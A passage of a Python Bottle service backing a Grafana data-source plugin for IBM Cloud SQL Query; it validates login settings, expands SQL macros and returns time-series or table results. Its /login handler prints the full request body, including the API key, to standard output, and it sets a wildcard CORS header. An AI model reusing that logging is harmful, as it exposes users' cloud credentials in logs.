# self._current_mts_df[key] = self._current_mts_df[key].loc[(self._current_mts_df[key].index >= idx_start) & (self._current_mts_df[key].index <= idx_end)]
# df = self._current_mts_df[key]
df = self._current_mts_df[key].loc[
(self._current_mts_df[key].index >= idx_start)
& (self._current_mts_df[key].index <= idx_end)
]
x = list(df.to_records(index=True))
data = ", ".join([str(i) for i in x])
assert len(data) > 0
values = """
VALUES -- timestamp, observation, key
{}
AS ds
""".format(
data
)
self._last_mts_idx_end = idx_end
return values
def get_job_id(self, key, refId):
"""return the job_id associated with a given `key`
Return
------
str: the job_id if found; otherwise return None
"""
if "refId" not in self[key]:
with lock_savejob:
if "refId" not in self[key]:
self[key]["refId"] = {}
if refId in self[key]["refId"]:
return self[key]["refId"][refId]
else:
return None
def save_job_id(self, key, refId, job_id):
"""save the job_id for the
(query in the given dashboard/panel) ~ 'refId' and
(datasource) ~ 'key'
NOTE: The information will be used by `get_cos_source_prev`"""
if "refId" not in self[key]:
with lock_savejob:
if "refId" not in self[key]:
self[key]["refId"] = {}
self[key]["refId"][refId] = job_id
self.save_no_interrupt()
def get_cos_source_prev(self, key, refId):
"""get COS URL from the output of a previous query
Exceptions
----------
KeyError"""
sqlClient = self.get_sqlclient(key, thread_safe=True)
job_id = self[key]["refId"][refId]
job_info = sqlClient.get_job(job_id)
res = "{} STORED AS {}".format(
job_info["resultset_location"], job_info["resultset_format"]
)
return res
def should_sql_stmt_be_run(self, key, refId, sql_stmt, sleep_time):
"""return True if it is safe to launch the query, i.e. no further change to it"""
milliseconds_since_epoch = datetime.now().timestamp() * 1000
if "query" not in self[key]:
with lock:
if "query" not in self[key]:
self[key]["query"] = {}
if refId not in self[key]["query"]:
with lock:
if refId not in self[key]["query"]:
self[key]["query"][refId] = {}
if sql_stmt not in self[key]["query"][refId]:
with lock:
if sql_stmt not in self[key]["query"][refId]:
self[key]["query"][refId][sql_stmt] = milliseconds_since_epoch
elif milliseconds_since_epoch > self[key]["query"][refId][sql_stmt]:
with lock:
if milliseconds_since_epoch > self[key]["query"][refId][sql_stmt]:
self[key]["query"][refId][sql_stmt] = milliseconds_since_epoch
sleep(sleep_time) # seconds
# if milliseconds_since_epoch == self[key]['query'][refId][sql_stmt]:
# # no new request to same query
# return True
if milliseconds_since_epoch < self[key]["query"][refId][sql_stmt]:
# there is a new request
return False
return True
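# Debounce sketch for should_sql_stmt_be_run (timings are illustrative): Grafana
# tends to POST the same panel query twice in quick succession. Each call records
# its timestamp; a repeated call for the same (key, refId, sql_stmt) sleeps
# `sleep_time` seconds, and if an even newer request arrives during that sleep the
# older call returns False, so stale duplicates are dropped before launching the
# SQL job.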
# from cloud_utilities import test_credentials
# ref_cloud_apikey = test_credentials.apikey
# ref_instance_crn = test_credentials.instance_crn
# ref_target_cos_url = test_credentials.result_location
# store information of each datasource-plugin 'id'
grafanaPluginInstances = CloudSQLDB()
# store the object connecting to SQL Client service
grafanaPluginInstancesSqlClient = {}
# data_schema = {}
# default_sql_client = None
# aiOps = SQLClient(api_key=ref_cloud_apikey, instance_crn=ref_instance_crn, target_cos_url=ref_target_cos_url)
##aiOps = SQLClient(api_key=cloud_apikey_raghu, instance_crn=instnacecrn, target_cos_url=target_cos_url, max_concurrent_jobs=4)
# aiOps.logon()
# sqlClient = aiOps
# sqlClient.engine.sql_ui_link()
#
##dict_data = sqlClient.get_cos_summary("cos://s3.us-south.cloud-object-storage.appdomain.cloud/sql-query-cos-access-ts/jobid=a3475263-469a-4e22-b382-1d0ae8f1d1fa")
# df = sqlClient.list_results("a3475263-469a-4e22-b382-1d0ae8f1d1fa")
# print(df.to_string())
# with pd.option_context('display.max_rows', None, 'display.max_columns', None): # more options can be specified also
# print(df)
app = Bottle()
# FUNCTIONS = {'series A': math.sin, 'series B': math.cos}
FUNCTIONS = {"series A": math.sin, "series B": "series B"}
tabular_data = {
"series A": [
{
"columns": [
{"text": "Time", "type": "time"},
{"text": "Country", "type": "string"},
{"text": "Number", "type": "number"},
],
"rows": [[1234567, "SE", 123], [1234567, "DE", 231], [1234567, "US", 321]],
"type": "table",
}
],
"series B": [
{
"columns": [
{"text": "Time", "type": "time"},
{"text": "Country", "type": "string"},
{"text": "Number", "type": "number"},
],
"rows": [[1234567, "BE", 123], [1234567, "GE", 231], [1234567, "PS", 321]],
"type": "table",
}
],
}
def convert_to_time_ms(timestamp):
"""Convert a Grafana timestamp to unixtimestamp in milliseconds
Args:
timestamp (str): the request contains ``'range': {'from':
'2019-06-16T08:00:05.331Z', 'to': '2019-06-16T14:00:05.332Z', ...``
"""
return 1000 * timegm(
datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%S.%fZ").timetuple()
)
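# For example, convert_to_time_ms('2019-06-16T08:00:05.331Z') returns
# 1560672005000: timetuple() drops the fractional .331 seconds before timegm()
# converts to epoch seconds, which are then scaled to milliseconds.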
def create_data_points(func, start, end, length=1020):
"""
A dummy function to produce sine and cosine data
You should replace this with your SQL, CQL or Mongo Query language.
    Also, make sure your database has the correct indices to increase performance
Args:
func (object) - A callable that accepts a number and returns a number
start (str) - timestamp
end (str) - timestamp
length (int) - the number of data points
"""
lower = convert_to_time_ms(start)
upper = convert_to_time_ms(end)
return [
[func(i), int(i)]
for i in [lower + x * (upper - lower) / length for x in range(length)]
]
def create_data_points_name_func(series_name_or_func, start, end, length=1020):
"""Generate fake data"""
if isinstance(series_name_or_func, str):
series_name = series_name_or_func
lower = convert_to_time_ms(start)
upper = convert_to_time_ms(end)
if series_name == "series B":
return [
[random.randint(0, 100), int(i)]
for i in [lower + x * (upper - lower) / length for x in range(length)]
]
else:
func = series_name_or_func
return create_data_points(func, start, end, length=length)
@app.route("/", method="GET")
def index():
return "<h1> Hello world</h1>"
@app.route("/login", method=["POST", "GET"])
def login():
"""handle 'testDataSource() - test connection to data source
Returns
-------
str
"OK"
"""
if request.method == "GET":
return "<h1>Testing login</h1>"
logger.debug("========= PRINT REQUEST ============")
logger.debug(request)
logger.debug("========= END PRINT REQUEST ============")
body = request.body.read().decode("utf-8")
body = json.loads(body)
import pprint
logger.debug("========= PRINT body of REQUEST ============")
pprint.pprint(body, width=1)
logger.debug("========= END PRINT body of REQUEST ============")
# apiKey = request.forms.get('apiKey')
# instance_crn = request.forms.get('instance_crn')
# result_location = request.forms.get('result_location')
# target_cos_url = request.forms.get('target_cos_url')
# instance_rate_limit = request.forms.get('instance_rate_limit')
print("Handling /login request")
id_name = "dummy_string"
key = gen_key(id_name, body.get("name"))
# always update
data_exist = False
if key in grafanaPluginInstances.keys():
tmp_body = grafanaPluginInstances[key]
stored_apiKey = tmp_body.get("apiKey").strip()
stored_instance_crn = tmp_body.get("instance_crn").strip()
stored_target_cos_url = tmp_body.get("target_cos_url").strip()
stored_source_cos_url = tmp_body.get("source_cos_url", "").strip()
stored_table = tmp_body.get("table", "").strip()
stored_using_table = tmp_body.get("using_table")
stored_instance_rate_limit = tmp_body.get("instance_rate_limit").strip()
stored_format_type = tmp_body.get("format_type", "").strip()
data_exist = True
# grafanaPluginInstances[key]['apiKey'] = body.get('apiKey')
# grafanaPluginInstances[key]['instance_crn'] = body.get('instance_crn')
# grafanaPluginInstances[key]['apiKey'] = body.get('apiKey')
# grafanaPluginInstances[key]['target_cos_url'] = body.get('target_cos_url')
# grafanaPluginInstances[key]['source_cos_url'] = body.get('source_cos_url')
# grafanaPluginInstances[key]['format_type'] = body.get('format_type')
# grafanaPluginInstances[key]['instance_rate_limit'] = body.get('instance_rate_limit')
# extract information
if "instance_crn" not in body or len(body["instance_crn"]) == 0:
msg = "Need CloudSQL CRN"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
instance_crn = body.get("instance_crn").strip()
if "apiKey" not in body or len(body["apiKey"]) == 0:
msg = "Need apiKey"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
apiKey = body.get("apiKey").strip()
# result_location = body.get('result_location').strip()
source_type = SourceType.UNUSED
if "using_table" not in body:
# TODO if this occur - go back and check why default value is not set in Grafana plugin
body["using_table"] = False
if body["using_table"] is False:
if "source_cos_url" in body and len(body["source_cos_url"]) > 0:
source_cos_url = body.get("source_cos_url").strip()
format_type = body.get("format_type").strip()
if source_cos_url is None or not ParsedUrl().is_valid_cos_url(
source_cos_url
):
msg = "Invalid COS URL for source"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
else:
source_type = SourceType.COSURL
else:
if "table" in body and len(body["table"]) > 0:
table = body.get("table").strip()
source_type = SourceType.TABLE
if "target_cos_url" not in body or len(body["target_cos_url"]) == 0:
msg = "Need target COS URL"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
target_cos_url = body.get("target_cos_url").strip()
msg = "Need rate limit as an int > 0"
e = HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
if "instance_rate_limit" not in body or len(body["instance_rate_limit"]) == 0:
raise e
elif not RepresentsInt(body["instance_rate_limit"]):
raise e
instance_rate_limit = body.get("instance_rate_limit").strip()
# assert(ref_cloud_apikey == apiKey)
# assert(ref_instance_crn == instance_crn)
if target_cos_url is None or not ParsedUrl().is_valid_cos_url(target_cos_url):
msg = "Invalid COS URL for target"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
# print(apiKey)
# print(instance_crn)
# print(result_location)
# print(target_cos_url)
# print(instance_rate_limit)
# logger.info(apiKey)
if key not in grafanaPluginInstancesSqlClient.keys():
# TODO: consider add max_concurrent_jobs info from `instance_rate_limit`
sqlClient = SQLClient(
api_key=apiKey,
instance_crn=instance_crn,
target_cos_url=target_cos_url,
iam_max_tries=IAM_MAX_TRIES,
max_tries=MAX_TRIES,
max_concurrent_jobs=instance_rate_limit,
)
grafanaPluginInstancesSqlClient[key] = sqlClient
if DEBUG:
print("Create new SQLClient: ", sqlClient)
# grafanaPluginInstances.save_sqlclients()
else:
sqlClient = grafanaPluginInstancesSqlClient[key]
try:
sqlClient.logon()
if sqlClient.logged_on is True:
if DEBUG:
print("Found SQLClient: ", sqlClient)
except AttributeError:
# recreate
sqlClient = SQLClient(
api_key=apiKey,
instance_crn=instance_crn,
target_cos_url=target_cos_url,
iam_max_tries=IAM_MAX_TRIES,
max_tries=MAX_TRIES,
max_concurrent_jobs=instance_rate_limit,
)
grafanaPluginInstancesSqlClient[key] = sqlClient
if DEBUG:
print("Create new SQLClient: ", sqlClient)
response.headers["Content-Type"] = "application/json"
try:
if data_exist and (
stored_apiKey != apiKey
or instance_crn != stored_instance_crn
or stored_target_cos_url != target_cos_url
or instance_rate_limit != stored_instance_rate_limit
):
if DEBUG:
print("HTTP input: ", instance_crn, " \n", apiKey)
sqlClient.configure(
api_key=apiKey,
instance_crn=instance_crn,
target_cos_url=target_cos_url,
)
# test API key
sqlClient.logon()
print("SQL URL: ", sqlClient.sql_ui_link())
# test SQL Query CRN
# test COS OUT URL
sql_stmt = """
SELECT 1
INTO {target_cos_url} STORED AS CSV
""".format(
target_cos_url=target_cos_url
)
sqlClient.run_sql(sql_stmt)
# # test COS IN URL
if source_type == SourceType.COSURL:
df = sqlClient.get_schema_data(source_cos_url, type=format_type)
if len(df) == 1 and df["name"][0] == "_corrupt_record":
msg = "Check format for source COS URL"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
elif source_type == SourceType.TABLE:
df = sqlClient.describe_table(table)
if df is None:
msg = "Check if table name is correct"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
# data_schema[source_cos_url] = sqlClient.get_schema_data(source_cos_url, type=format_type)
print("Login ok")
# response.status = 200
response.status = "200 API Key valid"
# return json.dumps({ 'status': 'success', 'message': 'Success',"data": {} }), 200
theBody = "Login ok."
response.body = theBody
# safe to update
grafanaPluginInstances[key] = body
grafanaPluginInstances.save()
return response
except (ibm_botocore.exceptions.CredentialRetrievalError, AttributeError):
# return BaseResponse(body='Invalid API key', status=401)
msg = "Invalid API key"
if DEBUG:
print(msg)
# response.body = json.dumps({'error':msg})
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
except CosUrlNotFoundException as e:
msg = "Wrong COS URL (either source or target) authentication"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
except SqlQueryCrnInvalidFormatException as e:
msg = "Wrong Sql Query CRN"
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
except HTTPResponse as e:
raise e
except Exception as error:
msg = "Unknown error: {}".format(str(type(error)))
raise HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
)
@app.hook("after_request")
def enable_cors():
"""
    Grafana makes AJAX calls to the data source in either proxy mode or direct mode.
    In proxy mode, Grafana uses its own backend server, which adds the CORS headers to the request.
    In direct mode, Grafana sends the request directly to this REST API app, so the response must
    contain the CORS headers so that the browser allows Grafana to read the result.
"""
print("after_request hook: enable_cors")
for key in response.headers.keys():
print(response.headers.getall(key))
print("----------")
response.headers["Access-Control-Allow-Origin"] = "*"
response.headers["Access-Control-Allow-Methods"] = "OPTIONS"
response.headers["Access-Control-Allow-Headers"] = "Accept, Content-Type"
@app.hook("after_request")
def add_hostname_info():
"""when deploying the webapp via Docker container,
it is good to know the location for debug purpose
return the three-letter location name and the container number from the end of the hostname string.
"""
print("after_request hook: add hostname-info")
for key in response.headers.keys():
print(key, ": ", response.headers.getall(key))
print("----------")
env_host = str(os.environ.get("HOSTNAME"))
    hostname = re.findall(r"[a-z]{3}-\d$", env_host)
    if hostname:
        # findall returns a list; use the first (and only) match
        response.headers["SP-LOCATION"] = hostname[0]
        return response
@app.post("/search")
def search():
"""Return a HTTPResponse containing a JSON array
with the names of the data series available
* headers that specify that this is response is JSON.
Returns
-------
HTTPResponse
list of name of the data series
"""
print(request)
return HTTPResponse(
body=json_dumps(["series A", "series B"]),
headers={"Content-Type": "application/json"},
)
@app.post("/query")
def query():
"""Handle the query from Grafana
This endpoint can return either
* time-series data
* a table for each series
Grafana sends a request which specifies that it queries for the tabular data.
The request is a JSON as
    .. code-block:: python
'targets': [{'target': 'series B', 'refId': 'A', 'type': 'table'}]
Grafana expects the time-series data in the format
* datapoints are a list of value and unixtimestamp in milliseconds.
    .. code-block:: python
[
{
"target":"series A", // The field being queried for
"datapoints":[
[622,1450754160000], // Metric value as a float , unixtimestamp in milliseconds
[365,1450754220000]
]
},
{
"target":"series B",
"datapoints":[
[861,1450754160000],
[767,1450754220000]
]
}
]
Returns
-------
    HTTPResponse
        a JSON-encoded list with one entry per returned time series or table
"""
# if key in grafanaPluginInstances.keys():
# body = grafanaPluginInstances[key]
# else:
# grafanaPluginInstances[key] = body
logger.debug("========= PRINT REQUEST ============")
logger.debug(request)
logger.debug("========= END PRINT REQUEST ============")
body = request.body.read().decode("utf-8")
body = json.loads(body)
import pprint
logger.debug("========= PRINT body of REQUEST ============")
pprint.pprint(body, width=1)
logger.debug("========= END PRINT body of REQUEST ============")
# check to see if it's safe to launch
query = body["targets"][0]
# id = query["id"]
id_name = "dummy_string"
name = query["name"]
key = gen_key(id_name, name)
key_refId = gen_key_refId(body["dashboardId"], body["panelId"], query["refId"])
sql_stmt = query["queryText"]
sleep_time = max(2.0, min(15.0, 2 * len(body["targets"])))
if not grafanaPluginInstances.should_sql_stmt_be_run(
key, key_refId, sql_stmt, sleep_time
):
# don't launch any
body = json_dumps([])
return HTTPResponse(body=body, headers={"Content-Type": "application/json"})
# launch now
# loop through all queries and process it
resp_body = []
sqlClient = None
key = None
for query in body["targets"]:
if "hide" in query and query["hide"] is True:
continue
res, error_obj = process_query(query, body, sqlClient=sqlClient, old_key=key)
if error_obj is not None:
raise error_obj
if isinstance(res, list):
for r in res:
resp_body.append(r)
if res is None:
# get_result <- False
pass
else:
resp_body.append(res)
body = json_dumps(resp_body)
return HTTPResponse(body=body, headers={"Content-Type": "application/json"})
def process_query(fullquery, body, sqlClient=None, old_key=None):
"""
Parameters
------------
fullquery: dict
The dict object with all information required to launch a query
body: dict
The body of the original full HTTP request
sqlClient: SQLClient
The object that can launch the sql stmt string
old_key: str
The key which tracks the given sqlClient object
Returns
--------
returns a tuple (result, error_object)
None, error_object --> error is detected
result, None --> result
None, None --> when result is not needed [intermediate result]
    NOTE: A result can be a dict, representing a single time series or a single table,
    or a list of dicts, representing multiple time series
"""
# i = i-th query
# fullquery = body["targets"][i]
result = None
data_type = "TableData"
if "format" in fullquery and fullquery["format"] == "time_series":
data_type = "TimeSeries"
if "queryText" not in fullquery:
# don't run further
# TODO - return empty things
return {}, None
sql_stmt = fullquery["queryText"]
if len(sql_stmt.strip()) == 0:
return None, None
logger.debug("========= PRINT sql_stmt ============")
logger.debug(sql_stmt)
logger.debug("========= END PRINT sql_stmt ============")
# id = fullquery["id"]
id_name = "dummy_string"
name = fullquery["name"]
key = gen_key(id_name, name)
# TODO : calculate these and check if SQL query uses
# 'DAY' 'MONTH' 'YEAR' to replace it with:
# DAY between day_from and day_to
# MONTH between month_from and month_to
# YEAR between year_from and year_to
#
from dateutil import parser
dt_from = parser.parse(body["range"]["from"])
dt_to = parser.parse(body["range"]["to"])
sdt_from = body["range"]["from"]
sdt_to = body["range"]["to"]
if len(get_columns_from_single_select(sql_stmt)) == 0 and re.search(
r"(?i)^\s*select", sql_stmt
):
msg = "The 'SELECT *' is being used: Not accepted in the query with Id {}".format(
fullquery["refId"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
columns = parse_sql_columns(sql_stmt)
columns_from_to = find_column_mapping(sql_stmt, columns)
if len(columns) > 0:
# find the column containing time - for time replacement
# when $__timeFilter() is used
time_col = columns[0]
if "time_column" in fullquery:
tmp = fullquery["time_column"].strip()
if len(tmp) > 0:
time_col = tmp
if time_col not in columns:
msg = "The name for time-column {} doesn't match with the column(s) in the query with Id {}".format(
time_col, fullquery["refId"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
sql_stmt = process_macro_timeFilterColumn(
p_timeFilterColumn, sql_stmt, sdt_from, sdt_to
)
patterns = p_timeFilter.findall(sql_stmt)
for pattern in patterns:
pattern = p_timeFilter.search(sql_stmt)
if pattern:
# the $__timeFilter is used
appname = pattern.group(1).strip().lower()
substr = ""
# process for regular data
type_of_column = appname
if "string" == type_of_column:
# the type is string
# if {time_col} is in timestamp
substr += """ to_timestamp({time_col}) BETWEEN to_timestamp("{dt_from}") and to_timestamp("{dt_to}")""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
)
else:
# flake8: noqa = E501
substr += """ cast({time_col}/1000 as long) BETWEEN to_unix_timestamp(to_timestamp("{dt_from}")) and to_unix_timestamp(to_timestamp("{dt_to}"))""".format(
time_col=time_col, dt_from=sdt_from, dt_to=sdt_to
) # noqa = E501
sql_stmt = p_timeFilter.sub(substr, sql_stmt, count=1)
sql_stmt = process_macro_data_source(
p_cos_in, grafanaPluginInstances.get_cos_source, key, sql_stmt
)
sql_stmt = process_macro_data_source(
p_cos_in_using, grafanaPluginInstances.get_cos_source_using, key, sql_stmt
)
p_reg = p_cos_in_test
patterns = p_reg.findall(sql_stmt)
for pattern in patterns:
pattern = p_reg.search(sql_stmt)
if pattern.group(1) is None:
# $__source_test
ts_form = ""
else:
# $__source_test()
ts_form = re.sub(r"\(|\)", "", pattern.group(1).strip().lower())
substr = ""
        if ts_form in ["ts", ""]:  # single time-series
            substr = grafanaPluginInstances.get_sts_random_data(key, dt_from, dt_to)
        if "mts" == ts_form:  # multiple time-series
substr = grafanaPluginInstances.get_mts_random_data(key, dt_from, dt_to)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# get source COS URL as the output of a previous query
p_reg = p_cos_in_prev
patterns = p_reg.findall(sql_stmt)
for pattern in patterns:
pattern = p_reg.search(sql_stmt)
if pattern.group(1) is None:
# $__source_prev
msg = "Need to specify refId name in $__source_prev, e.g. $__source_prev(A)"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
else:
# $__source_prev()
prev_refId_name = re.sub(r"\(|\)", "", pattern.group(1).strip())
substr = ""
if len(prev_refId_name) == 0:
msg = "Need to specify refId name in $__source_prev, e.g. $__source_prev(A)"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
# TODO
# May extend here to allow reading data from another panel and/or dashboard
key_refId = gen_key_refId(body["dashboardId"], body["panelId"], prev_refId_name)
try:
substr = grafanaPluginInstances.get_cos_source_prev(key, key_refId)
except KeyError:
msg = (
"The name {} used in $__source_prev()"
"does not exist or is not the prior sql statement in the chain"
).format(prev_refId_name)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
# get target COS URL
p_reg = p_cos_out
patterns = p_reg.findall(sql_stmt)
for _ in patterns:
pattern = p_reg.search(sql_stmt)
substr = ""
if pattern.group(1) is None:
# $__dest
substr = ""
else:
# $__dest()
# $__dest(<format> [,suffix])
# Example:
# $__dest(parquet)
# $__dest(parquet, a/b/c)
args_str = re.sub(r"\(|\)", "", pattern.group(1).strip())
if len(args_str) > 0:
arg_list = args_str.split(",")
if len(arg_list) > 2:
msg = "$__dest() can't have more than two arguments"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if len(arg_list) == 1:
# must be format type
format_type = arg_list[0].upper()
suffix = ""
else:
format_type = arg_list[0].upper()
suffix = arg_list[1].strip()
if format_type not in ["PARQUET", "AVRO", "CSV", "JSON", "ORC"]:
                    msg = "Invalid format of data used in $__dest macro"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
substr = grafanaPluginInstances.get_cos_dest(key, suffix, format_type)
if pattern:
# the $__source_test is used
sql_stmt = p_reg.sub(substr, sql_stmt, count=1)
try:
while True:
try:
sql_stmt = format_sql(sql_stmt)
sql_stmt = sql_stmt.replace("\\'", '"')
logger.info("Query to be issued:\n", sql_stmt)
# TODO: convert this to a function with
# and decorate the function with @functools.lru_cache
# https://docs.python.org/3.4/library/functools.html#functools.lru_cache
df = None
key_refId = gen_key_refId(
body["dashboardId"], body["panelId"], fullquery["refId"]
)
                # Grafana sometimes sends the same request twice; this guards against
                # running the query twice on Cloud SQL. A new query may also arrive
                # shortly and override the current one - since a launched SQL query
                # cannot be cancelled, the request is queued and we wait a little
                # before actually launching it.
                # if not grafanaPluginInstances.should_sql_stmt_be_run(key, key_refId, sql_stmt):
                #     break
                # TODO - consider allowing users to request a 'rerun'
rerun = False
if sqlClient:
assert old_key == key
if "get_result" in fullquery and fullquery["get_result"] is False:
job_id = query_data_noresultback(
key, sql_stmt, rerun=rerun, sqlClient=sqlClient
)
else:
df, job_id = query_data(
key, key_refId, sql_stmt, rerun=rerun, sqlClient=sqlClient
)
                # only an error when results were actually requested
                if df is None and fullquery.get("get_result", True) is not False:
msg = "Query {}: no data returned or query failed due to timeout".format(
fullquery["refId"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
                # a unique reference needs dashboardId + panelId + refId
                # TODO : when the webapp is shared by multiple Grafana instances,
                # the dashboardId and panelId may collide across instances
                # --> need to resolve this
grafanaPluginInstances.save_job_id(key, key_refId, job_id)
break
except RateLimitedException:
sleep(10)
except TooManyRowsException as e:
msg = "The query returns too many rows - please revise it"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
except NoResultException as e:
msg = "The query returns nothing - please revise it"
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
if "get_result" in fullquery and fullquery["get_result"] is False:
return None, None
except CosUrlInaccessibleException as e:
msg = "Query {}: Check if you use the right data-source: {}".format(
fullquery["refId"], str(e)
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
except Exception as e:
msg = "Query {}: unknown error {}".format(fullquery["refId"], str(e))
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
logger.info("RESULT is available")
if df is None:
# no data returned
msg = "Query {}: No data returned: check the time rang".format(
fullquery["refId"]
)
return (
None,
HTTPResponse(
body=json.dumps({"error": msg}),
status=403,
headers={"Content-type": "application/json"},
),
)
    # convert NaN to an empty string so that the client can handle it
df.replace(np.nan, "", regex=True, inplace=True)
if data_type == "TimeSeries":
# In TypeScript:
# export type TimeSeriesValue = string | number | null;
# export type TimeSeriesPoints = TimeSeriesValue[][];
# export interface TimeSeries {
# target: string;
# datapoints: TimeSeriesPoints;
# unit?: string;
# }
        # [TimeSeries] body must be a list; each element is a dict with these fields
        # . 'target' = name of a series
        # . 'datapoints' = the 2D data [row][col]
        # . 'unit' = (optional)
        # {'target': name, 'datapoints': datapoints})
# DataFrame
"""
https://github.com/grafana/grafana/blob/master/packages/grafana-data/src/dataframe/processDataFrame.ts
{
name: timeSeries.target || (timeSeries as any).name,
refId: timeSeries.refId,
meta: timeSeries.meta,
fields,
length: values.length, // # rows in DataFrame
};
which means we return a dict
{
'name': name,
'refId': refId,
'meta': any metadata,
'length': numeric, // # rows in DataFrame
'fields': [
{
'name': col-name, // e.g. 'Time'
'type': 'fieldtype', //see above
'config': {}, //optional
'values': [list-of-values]
},
{
'name': col-name, //e.g. 'Value'
'type': 'fieldtype', //see above
config: {
unit: "a unit-here",
},
'values': [list-of-values]
                'labels': originally the 'tag' attribute in timeSeries
}
]
}
"""
time_col = df.columns[0]
if "time_column" in fullquery:
tmp = fullquery["time_column"].strip()
if len(tmp) > 0:
time_col = tmp
if time_col in columns_from_to:
time_col = columns_from_to[time_col]
df = revise_time_column(time_col, df)
logger.debug("========= PRINT result of sql_stmt ============")
logger.debug(type(df))
logger.debug(".. .first 5 rows")
logger.debug(df.head(5))
logger.debug("========= END PRINT result of sql_stmt ============")
name = "series" + fullquery["refId"]
col_names = list(df.columns)
index = col_names.index(time_col)
# IMPORTANT: 2nd column must be timestamp
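        # (Grafana's legacy "datapoints" format expects [value, epoch-ms] pairs, which
        # is presumably why the time column is swapped into the second position here.)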
if index != 1:
tmp = col_names[1]
col_names[1] = time_col
col_names[index] = tmp
if len(col_names) > 2:
# process MTS (multi-time-series)
metrics_col = df.columns[2]
if "metrics_column" in fullquery:
tmp = fullquery["metrics_column"].strip()
if len(tmp) > 0:
metrics_col = tmp
index = col_names.index(metrics_col)
if index == 0:
tmp = col_names[2]
col_names[2] = metrics_col
col_names[index] = tmp
col_names = col_names[0:2]
# try returning multiple time-series
metrics = df[metrics_col].unique()
result = []
for met in metrics:
name = met
df_tmp = df[df[metrics_col].eq(met)]
datapoints = df_tmp[col_names].values.tolist()
result.append({"target": str(name), "datapoints": datapoints})
else:
# process STS (single TS)
datapoints = df[col_names].values.tolist()
# remember that an HTTP request can contain multiple queries, i.e. targets is a list
# that's why the body result should be a list
result = {"target": str(name), "datapoints": datapoints}
elif data_type == "TableData":
# [TableData] body must be a list, an element is a dict with 3 fields
# . 'type': 'table' or 'timeseries'
# . 'columns': a list of len = number of columns, each element is a dict of 2 entries:
        # 'text' : field-name, 'type': a string representation of 'time',
# 'string', 'number' [a value provided by FieldType in Grafana]
# . 'rows' : a list, of len = number of rows, and each entry is a list of values in one row
# 'series A': [{
# "columns":[
# {"text":"Time","type":"time"},
# {"text":"Country","type":"string"},
# {"text":"Number","type":"number"}
# ],
# "rows":[
# [1234567,"SE",123],
# [1234567,"DE",231],
# [1234567,"US",321]
# ],
# "type":"table"
# }],
# body = json_dumps(tabular_data[series])
time_col = ""
if "time_column" in fullquery:
tmp = fullquery["time_column"].strip()
if len(tmp) > 0:
time_col = tmp
if time_col in columns_from_to:
time_col = columns_from_to[time_col]
df = revise_time_column(time_col, df)
mdict = {}
mdict["columns"] = []
y = build_table_schema(df)
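        # build_table_schema (presumably pandas.io.json.build_table_schema) returns a
        # Table Schema dict whose 'fields' list carries a name/type pair per column;
        # the loop below maps those pandas types onto Grafana column types.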
for col in y["fields"]:
if col["name"] == "index":
continue
x = {}
x["text"] = col["name"]
stype = ""
if col["type"] in ["integer", "number"]:
stype = "number"
elif col["type"] in ["datetime"] or col["name"] == time_col:
stype = "time"
elif col["type"] in ["string"]:
stype = "string"
elif col["type"] in ["boolean"]:
stype = "boolean"
else:
print("col: ", col["type"])
logger.info("col: ", col["type"])
assert 0
x["type"] = stype
mdict["columns"].append(x)
mdict["rows"] = df.values.tolist()
result = mdict
if DEBUG:
logger.debug("=====")
logger.debug(".. print first 5 rows")
# don't print too long result
import pprint
pprint.pprint(result["columns"], width=1)
pprint.pprint(len(result["rows"]))
# pprint.pprint(result['rows'][1:5], width=1, depth=1)
return result, None
@app.post("/variable")
def variable():
"""Handle the query from Grafana that read the content for a variable which can be
* list of values
* list of label/value pair
Returns
-------
[type]
[description]
"""
# if key in grafanaPluginInstances.keys():
# body = grafanaPluginInstances[key]
# else:
# grafanaPluginInstances[key] = body
print("========= Variable content ============")
print(request)
body = request.body.read().decode("utf-8")
body = json.loads(body)
import pprint
print("========= PRINT body of REQUEST ============")
pprint.pprint(body, width=1)
